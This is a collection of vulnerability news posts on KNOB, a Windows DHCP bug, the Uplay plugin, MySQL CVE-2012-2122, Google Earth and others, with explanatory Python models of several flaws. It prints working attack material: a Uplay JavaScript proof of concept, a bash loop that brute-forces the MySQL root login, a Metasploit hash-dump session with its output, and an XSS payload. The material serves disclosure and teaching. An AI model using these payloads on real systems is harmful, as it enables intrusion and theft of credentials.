Security flaw in Bluetooth-enabled devices

A group of security researchers at the Center for IT-Security, Privacy, and Accountability (CISPA) found a flaw that could affect billions of Bluetooth-enabled devices, which includes smartphones, laptops, smart IoT devices, and other devices.

The vulnerability is tracked as CVE-2019-9506 and the researchers nicknamed it KNOB (Key Negotiation of Bluetooth).

According to the researchers, the flaw is in the negotiation of the encryption key size for Bluetooth BR/EDR connections: an attacker in radio range can force both devices to agree on a key with as little as one byte of entropy, brute-force that key, and then decrypt and inject traffic between the two devices. What makes the flaw notable is that it works even when the devices were paired long ago, because the key size is negotiated afresh on every connection.

According to the KNOB attack's official website, every standard-compliant Bluetooth BR/EDR device could be affected. “We conducted KNOB attacks on more than 17 unique Bluetooth chips (by attacking 24 different devices). At the time of writing, we were able to test chips from Broadcom, Qualcomm, Apple, Intel, and Chicony manufacturers. All devices that we tested were vulnerable to the KNOB attack,” it reads.

Bluetooth SIG has issued a security notice regarding the vulnerability.

Conditions for a successful attack, according to the notice:
  • Both devices have to be vulnerable; if either of them is not affected, the attack does not work
  • Both devices have to be within radio range and establishing a BR/EDR connection
  • The attacker has to be able to block the direct transmissions between the two devices and retransmit the key size negotiation messages with the size lowered
  • An existing connection cannot be attacked; the attack has to happen during negotiation or renegotiation of the encryption key for a paired connection


The Bluetooth SIG has updated the Bluetooth Core Specification to recommend a minimum encryption key length of 7 octets for BR/EDR connections; enforcing that minimum in the controller firmware is the remedy that device vendors are shipping.
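The attack is a downgrade of the key size negotiation, not a break of the pairing, and a short model makes the work factor concrete. The code below is an added example, not the CISPA researchers' code: the LMP exchange is reduced to one proposal per side, the entropy reduction to keeping the first N bytes of a 16-byte link key, and the E0 cipher to a SHA-256 keystream (all three are stand-ins and named as such in the comments). What it shows is real: once the attacker rewrites the proposal to one octet there are only 256 candidate session keys, and a responder that refuses sizes below 7 octets stops the attack before any traffic is encrypted.

```python
import hashlib

MAX_KEY_OCTETS = 16
SIG_MINIMUM_OCTETS = 7      # minimum the Bluetooth SIG recommends after KNOB


def negotiate_key_size(initiator_max, responder_max, responder_min=1, attacker=None):
    """Model of the LMP encryption key size negotiation (stand-in, not
    controller code). Each side proposes the largest size it supports and the
    accepted size is the smaller proposal. `attacker` is an optional function
    that rewrites the proposal on the air, which is what KNOB does.
    Returns the accepted size, or None if the responder refuses because the
    size is below its configured minimum."""
    proposal = initiator_max
    if attacker is not None:
        proposal = attacker(proposal)
    accepted = min(proposal, responder_max)
    if accepted < responder_min:
        return None
    return accepted


def session_key(link_key: bytes, octets: int) -> bytes:
    """Stand-in for the entropy-reduction step: only `octets` bytes of the
    link key survive. The real controller uses a polynomial reduction, but
    the amount of entropy left is the same."""
    return link_key[:octets] + b"\x00" * (MAX_KEY_OCTETS - octets)


def keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    """Toy stream cipher standing in for E0: SHA-256 in counter mode."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:n]


def encrypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


def knob(link_key: bytes, plaintext: bytes, responder_min: int = 1, nonce: bytes = b"\x10" * 8):
    """Force a one-octet key, capture one encrypted frame, then brute-force the
    candidate session keys against a known plaintext prefix. Returns the
    recovered plaintext, or None when the responder refused the negotiation."""
    size = negotiate_key_size(16, 16, responder_min, attacker=lambda _proposal: 1)
    if size is None:
        return None
    captured = encrypt(session_key(link_key, size), nonce, plaintext)   # sniffed on the air
    for candidate in range(256 ** size):                               # 256 tries when size == 1
        guess = session_key(candidate.to_bytes(size, "big"), size)
        trial = encrypt(guess, nonce, captured)
        if trial.startswith(b"AT+"):       # known-plaintext check, e.g. HFP AT commands
            return trial
    return None


if __name__ == "__main__":
    key = bytes(range(16))                 # constructed link key
    print("unpatched responder:", knob(key, b"AT+CIND?"))
    print("responder enforcing 7 octets:", knob(key, b"AT+CIND?", responder_min=SIG_MINIMUM_OCTETS))
```

The responder-side minimum is the whole fix: the initiator's proposal is untrusted input, and a controller that accepts any size down to one octet hands the attacker a 256-key search no matter how strong the link key was.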

Vulnerability in DHCP client let hackers take control of network

A critical remote code execution vulnerability in the Windows DHCP client allows an attacker to take control of a system by sending it malicious DHCP reply packets.

A Dynamic Host Configuration Protocol (DHCP) client lets a device request configuration parameters, such as an IP address, from a DHCP server; on Windows the client runs on the host's Ethernet and other network interfaces.

To join a network, the client needs its complete TCP/IP configuration, which the server delivers in the DHCP Offer and DHCP Ack messages.

DHCP is a client-server protocol: the server dynamically allocates IP addresses and distributes them, together with the other configuration options, to the clients that request them.

The vulnerability gives remote code execution on any host whose vulnerable DHCP client obtains its configuration from a rogue DHCP server under the attacker's control.

Vulnerability details

The remote code execution vulnerability resides in the dhcpcore.dll function DecodeDomainSearchListData, which decodes the encoded value of the domain search list option (DHCP option 119).

During decoding, the function first calculates the length of the decoded domain name list, then allocates that much memory and copies the decoded list into it.

According to McAfee's research, a malicious server can craft an encoded search list such that the length DecodeDomainSearchListData computes is zero. That leads to a HeapAlloc of zero bytes, followed by a write past the end of that allocation: an out-of-bounds heap write.

The vulnerability has been patched and is tracked as CVE-2019-0547. The patch adds a check that the size argument to HeapAlloc is not zero; if it is, the function exits.
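The format in question is DHCP option 119, the Domain Search list from RFC 3397: a sequence of DNS-style names built from length-prefixed labels, each name ending in a zero byte, with two-byte 0xC0 compression pointers back into the option. The code below is an added example, not McAfee's or Microsoft's: it parses the option, computes the output size in the same two-pass way the post describes, and applies the zero-size check that the patch added. The option values at the bottom are constructed for the example and are not from the advisory.

```python
from typing import Optional


def parse_domain_search(opt: bytes) -> list[str]:
    """Decode a DHCP option 119 (RFC 3397) value into a list of names.
    Raises ValueError on truncated labels and on pointers that run forward,
    out of range, or in a loop."""
    names = []
    i = 0
    while i < len(opt):
        labels, pos, seen, jumped = [], i, set(), False
        while True:
            if pos >= len(opt):
                raise ValueError("name runs past end of option")
            length = opt[pos]
            if length == 0:                          # end of this name
                pos += 1
                break
            if length & 0xC0 == 0xC0:                # compression pointer
                if pos + 1 >= len(opt):
                    raise ValueError("truncated pointer")
                target = ((length & 0x3F) << 8) | opt[pos + 1]
                if target >= pos or target in seen:
                    raise ValueError("pointer must point backwards and must not loop")
                seen.add(target)
                if not jumped:
                    i = pos + 2                      # the next name starts after the pointer
                    jumped = True
                pos = target
                continue
            if length & 0xC0:
                raise ValueError("reserved label type")
            if pos + 1 + length > len(opt):
                raise ValueError("truncated label")
            labels.append(opt[pos + 1:pos + 1 + length].decode("ascii"))
            pos += 1 + length
        if not jumped:
            i = pos
        names.append(".".join(labels))
    return names


def decoded_length(names: list[str]) -> int:
    """Bytes needed to store the names as consecutive NUL-terminated strings.
    A list holding only the empty (root) name needs 0 bytes: this is the size
    the unpatched decoder handed to HeapAlloc."""
    return sum(len(n) + 1 for n in names if n)


def decode_search_list(opt: bytes) -> Optional[bytes]:
    """Mirror of the patched flow: size the output, refuse a zero-byte
    allocation, then fill the buffer. Returns None for the crafted case."""
    names = parse_domain_search(opt)
    size = decoded_length(names)
    if size == 0:                 # the check added for CVE-2019-0547: never HeapAlloc(0)
        return None
    buf = bytearray(size)
    off = 0
    for name in names:
        if not name:
            continue
        buf[off:off + len(name)] = name.encode("ascii")
        off += len(name) + 1      # leave the NUL terminator in place
    return bytes(buf)


# Constructed option values (not from the advisory):
GOOD_OPT = b"\x03eng\x07example\x00\x04corp\xc0\x04"   # "corp" plus a pointer to "example"
CRAFTED_OPT = b"\x00"                                  # a single root name: decodes to nothing


if __name__ == "__main__":
    print(parse_domain_search(GOOD_OPT), decode_search_list(GOOD_OPT))
    print(parse_domain_search(CRAFTED_OPT), decode_search_list(CRAFTED_OPT))
```

The crafted value is legal by the RFC (a root name is a valid search entry), which is why a decoder that only validates syntax still reaches the zero-byte allocation; the size of the output has to be checked as well.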


How the Mackeeper failed to secure Mac


MacKeeper, a program sold to keep Mac computers secure, suffered from a critical remote code execution vulnerability.

The flaw was a lack of input validation in the program's handling of its custom URL scheme. It allowed an attacker to execute arbitrary commands with root privileges with little to no user interaction: a visit to a specially crafted web page in Safari was enough to trigger it.

If the user had already given MacKeeper their password during normal use of the program, they were not asked for it again before the arbitrary command ran.

If the user had not previously authenticated, they were prompted for their credentials; however, the text shown in the authentication dialog could be set to anything, so the user might not realise what they were actually approving.

The vulnerability, quite possibly a zero-day, was discovered by security researcher Braden Thomas, who released a demonstration link as proof of concept: clicking it uninstalled MacKeeper automatically.

MacKeeper is controversial among Mac users owing to its pop-ups and advertisements, but apparently has 20 million downloads worldwide.

The vulnerability existed even in the then-latest version 3.4. The company advised users to run MacKeeper's update tracker and install 3.4.1 or later. Users who have not updated can use a browser other than Safari, or remove the custom URL scheme handler from MacKeeper's Info.plist file.

VMware Patches critical directory traversal vulnerability in its VMware View


VMware has patched a critical directory traversal vulnerability in its VMware View desktop virtualization platform that could allow an attacker to read arbitrary files from affected View servers.

The vulnerability affects both the View Connection Server and the View Security Server. It was discovered by Digital Defense, a security service provider.

According to the VMware advisory, the affected versions are View 5.x prior to 5.1.2 and 4.x prior to 4.6.2. Users are advised to upgrade to the latest version.

Users who cannot immediately update their View servers are advised to disable the Security Server, or to block directory traversal attacks with an intrusion detection/prevention system or an application firewall.

CVE-2012-4170 : Adobe fixes Buffer Overflow Vulnerability in Photoshop


Adobe has released Photoshop CS6 version 13.0.1. The update closes a critical remote buffer overflow vulnerability in PNG image processing.

Francis Provencher discovered the vulnerability in Adobe Photoshop CS6, which can be exploited by malicious people to compromise a user's system.

According to the Secunia advisory, the vulnerability is caused by a boundary error in the "Standard MultiPlugin.8BF" module when processing a Portable Network Graphics (PNG) image. This can be exploited to cause a heap-based buffer overflow via a specially crafted "tRNS" chunk size.

Successful exploitation may allow execution of arbitrary code, but requires tricking a user into opening a malicious image.
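A parser that validates the chunk layout before any data is copied is the usual defence against this class of bug, and it is also the check a practitioner can run over untrusted images before handing them to a desktop application. The code below is an added example, not Adobe's plugin code or the Secunia proof of concept: it walks the chunk list of a PNG constructed inline (a 1x1 palette image), checks each declared chunk length against the file and each CRC, and then checks that the tRNS chunk's length is consistent with the IHDR colour type and the palette size, which is the boundary the advisory describes.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TRNS_FIXED_LENGTH = {0: 2, 2: 6}      # greyscale: one 16-bit sample; truecolour: three samples


def png_chunks(data: bytes):
    """Yield (type, body) for each chunk, checking declared lengths and CRCs
    before anything is copied out of the file."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    off = len(PNG_SIGNATURE)
    while off < len(data):
        if off + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[off:off + 8])
        end = off + 8 + length
        if end + 4 > len(data):
            raise ValueError(f"{ctype!r} declares {length} bytes but the file ends first")
        body = data[off + 8:end]
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            raise ValueError(f"{ctype!r} CRC mismatch")
        yield ctype, body
        off = end + 4


def is_well_formed(data: bytes) -> bool:
    """True when every chunk header, length and CRC is consistent."""
    try:
        for _ in png_chunks(data):
            pass
        return True
    except ValueError:
        return False


def trns_findings(data: bytes) -> list[str]:
    """Problems with the tRNS chunk; an empty list means its length is
    consistent with the IHDR colour type and the palette size."""
    findings, colour_type, palette_entries = [], None, 0
    for ctype, body in png_chunks(data):
        if ctype == b"IHDR":
            _w, _h, _depth, colour_type, _comp, _filt, _inter = struct.unpack(">IIBBBBB", body)
        elif ctype == b"PLTE":
            palette_entries = len(body) // 3
        elif ctype == b"tRNS":
            if colour_type == 3:                      # one alpha byte per palette entry, at most
                if len(body) > palette_entries:
                    findings.append(f"tRNS has {len(body)} entries for a {palette_entries}-entry palette")
            elif colour_type in TRNS_FIXED_LENGTH:
                if len(body) != TRNS_FIXED_LENGTH[colour_type]:
                    findings.append(f"tRNS length {len(body)} for colour type {colour_type}")
            else:                                     # types 4 and 6 carry alpha in the pixels
                findings.append(f"tRNS not permitted for colour type {colour_type}")
    return findings


def chunk(ctype: bytes, body: bytes) -> bytes:
    """Serialise one chunk with a correct CRC."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_png(trns_body: bytes) -> bytes:
    """Constructed 1x1 8-bit palette image; only the tRNS body varies."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 3, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")            # filter byte plus one palette index
    return (PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"PLTE", b"\x00\x00\x00")
            + chunk(b"tRNS", trns_body) + chunk(b"IDAT", idat) + chunk(b"IEND", b""))


if __name__ == "__main__":
    print("clean image:", trns_findings(build_png(b"\x80")))
    print("oversized tRNS:", trns_findings(build_png(b"\x80" * 4000)))
```

The two length checks are independent: a chunk can declare more bytes than the file holds (caught in `png_chunks`), and a chunk can be fully present yet longer than the structure it describes allows (caught in `trns_findings`). A decoder that sizes its buffer from the palette and copies from the chunk length needs both.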

The vulnerability is reported in versions 13.x only for Windows and Macintosh (confirmed in 13.0 20120315.r.428 on Windows).

Users can upgrade to Photoshop CS6 13.0.1 by selecting "Updates" under the Photoshop Help menu; this will launch the Adobe Application Manager, allowing users to select and install the update.

CVE-2012-0681 : Apple fixes Information disclosure vulnerability in Remote Desktop


Apple has released version 3.6.1 of its Apple Remote Desktop application to fix an information disclosure vulnerability.

Vulnerability details (CVE-2012-0681):
When connecting to a third-party VNC server with "Encrypt all network data" set, data is not encrypted and no warning is produced.

According to Apple's security advisory, this issue does not affect Apple Remote Desktop 3.5.1 and earlier; versions 3.5.2 up to and including 3.6.0 are affected.

The latest version, 3.6.1, addresses this issue by creating an SSH tunnel for the VNC connection when "Encrypt all network data" is set. If this is not possible, ARD will refuse the connection.

Apple Remote Desktop 3.6.1 may be obtained from Mac App Store,the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/

Prolexic found Vulnerability in Popular Dirt Jumper DDoS toolkit


Security vendor Prolexic has discovered a critical vulnerability in the popular Dirt Jumper DDoS toolkit family used by attackers to launch distributed denial of service attacks against corporate networks.

“DDoS attackers take pride in finding and exploiting weaknesses in the architecture and code of their targets. With this vulnerability report, we’ve turned the tables and exposed crucial weaknesses in their own tools,” said Scott Hammack, CEO at Prolexic.

Prolexic found the holes in the simplest part of the program: the GUI control panels used to command the bots, which turned out to be cobbled together from hastily coded PHP/MySQL scripts.

"With this information, it is possible to access the C&C server and stop the attack," Prolexic CEO Scott Hammack said in statement. "Part of our mission is to clean up the Internet. It is our duty to share this vulnerability with the security community at large."

CVE-2012-2665: LibreOffice vulnerable to multiple Heap-based buffer overflows


CVE-2012-2665: A few weeks after releasing LibreOffice 3.5.5, The Document Foundation has confirmed security holes in earlier versions of the open source LibreOffice suite.

According to the security advisory,  Multiple heap-based buffer overflow flaws were found in the XML manifest encryption tag parsing code of LibreOffice.

An attacker could create a specially-crafted file in the Open Document Format for Office Applications (ODF) format which when opened could cause arbitrary code execution.

Versions up to and including LibreOffice 3.5.4 are affected; Users are advised to upgrade your software to version 3.5.5 or 3.6.0.

Vulnerability in Ubisoft Uplay allows attacker to gain control of your computer



Google security researcher Tavis Ormandy has discovered a critical vulnerability in the Ubisoft Uplay browser plugin that could allow attackers to remotely run programs on your PC.

It is possible for attackers to use a few lines of JavaScript to persuade the plugin to launch arbitrary processes – the potential victim only needs to open a specially crafted web page.

"While on vacation recently I bought a video game called 'Assassin's Creed Revelations,' he posted on the Full Disclosure mailing list. "I noticed the installation procedure creates a browser plugin for its accompanying Uplay launcher, which grants unexpectedly (at least to me) wide access to websites."

The JavaScript code that exploits the vulnerability (the base64 argument decodes to C:\WINDOWS\SYSTEM32\CALC.EXE, so this proof of concept only starts the calculator):
var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");   // instantiates the Uplay browser plugin from any web page
document.body.appendChild(x);
// the plugin's open() passes attacker-chosen launcher arguments straight through, including the path of the executable to run
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
A proof-of-concept page lets users check whether their system is vulnerable: it attempts to start the Windows Calculator.

Ubisoft has fixed the security flaw.

“We have made a forced patch to correct the flaw in the browser plug-in for the Uplay PC application that was brought to our attention earlier today. We recommend that all Uplay users update their Uplay PC application without a Web browser open. This will allow the plug-in to update correctly. An updated version of the Uplay PC installer with the patch also is available from Uplay.com."Ubisoft statement reads.

"Ubisoft takes security issues very seriously, and we will continue to monitor all reports of vulnerabilities within our software and take swift action to resolve such issues.”

Yahoo! app vulnerability could be behind 'Android botnet'



Earlier this month, Microsoft engineer Terry Zink said he had discovered spam being sent from compromised Yahoo accounts by what looked like an international Android spam botnet.

He stated that the messages all came from Yahoo Mail servers and from compromised Yahoo accounts; that they were all stock spam, the typical pump-and-dump variety seen for years; and that they all carried the 'Sent from Yahoo! Mail on Android' text at the bottom.


Google, however, disputed that the spam was sent from an Android botnet, stating that the spammers may have used infected PCs and a fake mobile signature in an attempt to bypass email filters.

Security researchers at Lookout have identified a security hole in the Yahoo! Mail app for Android, which they believe to be responsible for the so-called mobile spam botnet. Today, Trend Micro experts confirmed the existence of the vulnerability.

Neither team could say for certain whether the vulnerability is responsible for the spam sent from mobile phones, but the fact that they independently pointed to the same weakness as a possible cause makes the scenario more plausible.


The vulnerability discovered by the researchers allow an attacker to gain access to a user’s Yahoo! Mail cookie.

This bug stems from the communication between Yahoo! mail server and Yahoo! Android mail client. By gaining this cookie, the attacker can use the compromised Yahoo! Mail account to send specially-crafted messages. The said bug also enables an attacker to gain access to user’s inbox and messages.

A critical Security vulnerability in MySQL/MariaDB [CVE-2012-2122]


Security researchers have revealed a serious vulnerability in MariaDB and MySQL that enables an attacker to log in to the database server as root without knowing the password. The vulnerability has been assigned CVE-2012-2122.

According to Sergei Golubchik, security coordinator at MariaDB, the flaw does not affect the official vendor binaries, but it does expose MariaDB and MySQL installations built from the affected source, versions such as 5.1.61, 5.2.11, 5.3.5, 5.5.22 and earlier, when compiled with certain optimizations (several Linux distribution packages were built this way).


This flaw was rooted in an assumption that the memcmp() function would always return a value within the range -127 to 127 (signed character). On some platforms and with certain optimizations enabled, this routine can return values outside of this range, eventually causing the code that compares a hashed password to sometimes return true even when the wrong password is specified. Since the authentication protocol generates a different hash each time this comparison is done, there is a 1 in 256 chance that ANY password would be accepted for authentication.

In short, if you try to authenticate to a MySQL server affected by this flaw, there is a chance it will accept your password even if the wrong one was supplied.

The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.

$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
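The memcmp() narrowing is easy to model end to end. The code below is an added example, not MySQL's password.c: it implements the native 4.1 scramble exchange (the stored hash is SHA1(SHA1(password)); the client answers SHA1(password) XOR SHA1(scramble || stored hash)) and a stand-in memcmp that returns the difference of the first differing 32-bit words, standing in for an optimised libc routine whose result is not confined to -127..127. The unpatched check narrows that int to a char, so one wrong password in roughly 256 is accepted; the patched check tests the full int.

```python
import hashlib
import random


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def stored_hash(password: bytes) -> bytes:
    """mysql.user keeps SHA1(SHA1(password)), shown as '*' + hex in the hash dump."""
    return sha1(sha1(password))


def client_response(password: bytes, scramble: bytes) -> bytes:
    """Native 4.1 authentication: SHA1(pw) XOR SHA1(scramble || SHA1(SHA1(pw)))."""
    stage1 = sha1(password)
    return xor(stage1, sha1(scramble + sha1(stage1)))


def word_memcmp(a: bytes, b: bytes) -> int:
    """Stand-in for an optimised memcmp that compares 32-bit words and returns
    the difference of the first pair that differ. Like real optimised
    routines, the result is not confined to the -127..127 range."""
    for i in range(0, len(a), 4):
        wa = int.from_bytes(a[i:i + 4], "big")
        wb = int.from_bytes(b[i:i + 4], "big")
        if wa != wb:
            return wa - wb
    return 0


def check_scramble(response: bytes, scramble: bytes, hash_stage2: bytes, patched: bool) -> bool:
    """True when the server accepts the login. The server recovers SHA1(pw)
    from the response, hashes it again and compares with the stored value.
    Unpatched: the int from memcmp is narrowed to my_bool (a char), so any
    difference that is a multiple of 256 reads as 0, i.e. as a match."""
    stage1 = xor(response, sha1(scramble + hash_stage2))
    diff = word_memcmp(hash_stage2, sha1(stage1))
    if patched:
        return diff == 0               # MY_TEST(memcmp(...)): any nonzero difference fails
    return (diff & 0xFF) == 0          # what survives the int -> char narrowing


def bypass_count(trials: int, patched: bool, seed: int = 7) -> int:
    """How often a wrong password is accepted over `trials` logins, each with
    a fresh random scramble, as the one-liner in the post does."""
    rng = random.Random(seed)
    stored = stored_hash(b"correct-password")
    hits = 0
    for _ in range(trials):
        scramble = bytes(rng.randrange(256) for _ in range(20))
        if check_scramble(client_response(b"wrong", scramble), scramble, stored, patched):
            hits += 1
    return hits


if __name__ == "__main__":
    print("wrong password accepted, unpatched:", bypass_count(20000, patched=False), "of 20000")
    print("wrong password accepted, patched:  ", bypass_count(20000, patched=True), "of 20000")
```

Note that the memcmp result is only narrowed because the function's return type is my_bool, a char; glibc's contract for memcmp is any int with the right sign, so the bug is in the caller, not the libc, and an unoptimised memcmp that happens to return small values merely hides it.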

Caveats and Defense

The first rule of securing MySQL is not to expose it to the network at large in the first place. Most Linux distributions bind the MySQL daemon to localhost, preventing remote access to the service. Where network access must be provided, MySQL also offers host-based access controls (the host part of each account in mysql.user). There are few use cases where the daemon should be intentionally exposed to the wider network without any form of host-based access control.


If you are responsible for a MySQL server that is currently exposed to the network unnecessarily, the easiest thing to do is to modify the my.cnf file in order to restrict access to the local system. Open my.cnf with the editor of your choice, find the section labeled [mysqld] and change (or add a new line to set) the "bind-address" parameter to "127.0.0.1". Restart the MySQL service to apply this setting.

Exploit Module for PenTesters:
This evening Jonathan Cran (CTO of Pwnie Express and Metasploit contributor) committed a threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database. This ensures that even if the authentication bypass vulnerability is fixed, you should still be able to access the database using the cracked password hashes. A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.


$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run

[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Reference:
Rapid7

TrueCaller Vulnerability Allows Changing Users Details

Security researcher Ali AlHabshi of Kuwait WhiteHat has discovered a vulnerability in the TrueCaller iPhone app that allows attackers to change users' details.

He reported the vulnerability to True Software, which confirmed it and released version 2.78 of TrueCaller to fix it.

The Vulnerability Details:
 The application allows users to search numbers if and only if the user enables Enhanced Search feature. When enabled, the user is warned that his contacts will be shared with other users to search and his address book is sent to TrueCaller database.

This process is done by sending the following HTTP request in cleartext:
post_contact_data=[{"REV":"","FN":"ContactName","TEL_CELL":["MobileNumber"],"TCBID":"Number","FID":"Number","TEL_WORK":[Number],"TEL_HOME":[],"CONTACT_ID":"3619","LID":""}]

From a security point of view this is bad practice and may lead to one of the following situations:

Privacy Issues
Although TrueCaller has a strict privacy policy, this behavior allows 3rd parties (i.e. ISP’s, Governments, Sniffers..etc) to intercept database entries and build a copy of TrueCaller’s database.

Fake Data
The “cleartext“, unencrypted POST request may be leveraged to fake/change/modify address book entries by repeating the POST request with fake entries in the parameter and fill TrueCaller’s database with fake (rogue) entries.

Here is an example of an intercepted request after enabling the Enhanced Search feature:


Enabling Enhanced Search features without having to share user’s Address Book:
When the user enables “Enhanced Search”, the application sends an encrypted HTTP GET request, followed by the HTTP POST request outlined above. If a malicious user allows the GET request to pass and “drops” the following POST request (which contains his address book), he will be able to enjoy the Enhanced Search feature without sharing his address book, which TrueCaller really do not want to happen.

Advisory Timeline
28/Apr/2012 – First contact: Vulnerability details sent
29/Apr/2012 – Response received: Asked for more details
29/Apr/2012 – Second Contact: More details provided and cleared TrueCaller doubts
30/Apr/2012 – Vulnerability Confirmed: TrueCaller started working on a fix
01/May/2012 – Vulnerability Fixed: Fix submitted to Apple for approval
17/May/2012 – New Version Released: Fix approved by Apple and released
01/Jun/2012 - Vulnerability Released.

Vulnerability in TreasonSMS allows hackers to run malicious code in iPhone


Vulnerability-Lab researchers discovered HTML injection and file include vulnerabilities in the TreasonSMS app that allow attackers to run malicious code on the iPhone.

About the TreasonSMS app:
TreasonSMS allows you to send SMS from your desktop computer. It turns your iPhone into an SMS web server, so you can send and reply to SMS from your computer over Wi-Fi.

According to the security advisory provided by the researchers, the vulnerability allows a remote attacker to inject persistent malicious script code on the application side of the iPhone.

This also allows the attacker to inject, for example, web shell scripts to gain control of the affected application folder. When the iPhone is jailbroken, exploitation can result in full control of the affected device.

"The bug is located in the input fields of the Message Sending & Message Output. An attacker can scan the victim on walkthrough because the IP of the webserver makes TreasonSMS available to anybody without a password. To exploit somebody on a walkthrough it is only required to scan for the stable IP via WLAN and access the panel for exploitation," the researcher said.

Vulnerability-Lab rated the vulnerability as high severity.

Vulnerability in Facebook app for Android & iOS leads to Identity theft


A new security vulnerability in Facebook application for Android and iOS allows an attacker to steal your Facebook identity.

Gareth Wright, a UK-based app developer for Android and iOS, identified a security vulnerability in the Facebook mobile application: the app stores its login credentials (the access token) unencrypted, leaving them accessible to other malicious apps or to anyone with a USB connection to the device.

He explained the hack in a blog post.

Facebook responded this vulnerability discover by issuing the following statement:
"Facebook’s iOS and Android applications are only intended for use with the manufacturer provided operating system, and access tokens are only vulnerable if they have modified their mobile OS (i.e. jailbroken iOS or modded Android) or have granted a malicious actor access to the physical device.

"We develop and test our application on an unmodified version of mobile operating systems and rely on the native protections as a foundation for development, deployment and security, all of which is compromised on a jailbroken device."
This statement implies the issue is confined to jailbroken devices; TheNextWeb (TNW) says that is untrue: "Your Facebook app on iOS is absolutely vulnerable because using a tool like iExplore, which is what Wright used to perform his white label hack, does not require a jailbreak."

Researchers also discovered that popular file-syncing app Dropbox also exhibits the vulnerability.

Code Execution vulnerability in Google Earth found by longrifle0x


A code execution vulnerability in the Google Earth application was identified by security researcher Ucha Gobejishvili (also known as longrifle0x), who demonstrated the attack on his own blog.

The Placemark field in the app does not sanitize HTML, so an attacker can inject and run JavaScript. The researcher demonstrated the attack by inserting the following code:
<A HREF="javascript:document.location='http://www.secday.blogspot.com/'">XSS</A><marquee>Georgia</marquee>
The tag above executes the script when the link is clicked and navigates to secday.blogspot.com; this is script injection (XSS) in the application's HTML rendering of placemarks rather than native code execution.

GOM Media Player v. 2.1.37 vulnerable to Buffer Overflow Attack

Security researcher Ucha Gobejishvili (longrifle0x) of Vulnerability Lab discovered a buffer overflow vulnerability in the GOM Media Player application. Version 2.1.37 was found to be vulnerable.

Buffer overflow:
An application is said to be vulnerable to a buffer overflow when it allows attackers to store data in a buffer beyond the size allocated for it. By successfully exploiting such a vulnerability, an attacker may be able to run arbitrary code.
The researcher claimed the vulnerability can be exploited by local and remote attackers and rated the risk as high.

POC:
1) Download and open the software client
2) Click Open ==> URL...
3) Enter the proof-of-concept string
4) Observe the result

The video demonstrating the vulnerability:

Google Wallet's PIN System can be easily cracked from rooted devices

Joshua Rubin, a security researcher at zvelo, has discovered that the Google Wallet PIN can easily be cracked by brute force on a device that is rooted.

Google Wallet is the first publicly available Near Field Communication (NFC) payment system that turns your smartphone into a credit card; purchases are authorized by entering a PIN.

To secure transactions, NFC payment uses a hardware component called the Secure Element (SE) to store confidential data such as the complete credit card number.

To authenticate the user and grant access to the SE, Google Wallet requires a 4-digit numeric PIN when the app is first launched. Unfortunately, the PIN is not verified inside the SE; it is stored as a salted SHA-256 hash on the device itself.
"Knowing that the PIN can only be a 4-digit numeric value, it dawned on us that a brute-force attack would only require calculating, at most, 10,000 SHA256 hashes," Joshua Rubin said. "This is trivial even on a platform as limited as a smartphone. Proving this hypothesis took little time."

Google Wallet allows only five invalid PIN attempts before locking the user out, but with root access an attacker can read the hash and salt and brute-force the PIN offline without a single invalid attempt being recorded.

Rubin concludes that the only way to solve this issue would be to move the PIN verification into the SE itself and to no longer store the PIN hash and salt outside the SE.
